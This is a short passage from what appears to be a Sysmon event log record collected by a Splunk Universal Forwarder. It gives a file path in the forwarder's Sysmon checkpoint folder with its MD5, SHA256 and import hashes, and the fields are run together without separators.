Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A62CFABFED2AA40E7EEB0B88046AC8F,SHA256=08D2061D07FF1FA97585D4B3C19F7F5432912BA80FD502202277B66280F014C3,IMPHASH=00000000000000000000000000000000falsetrue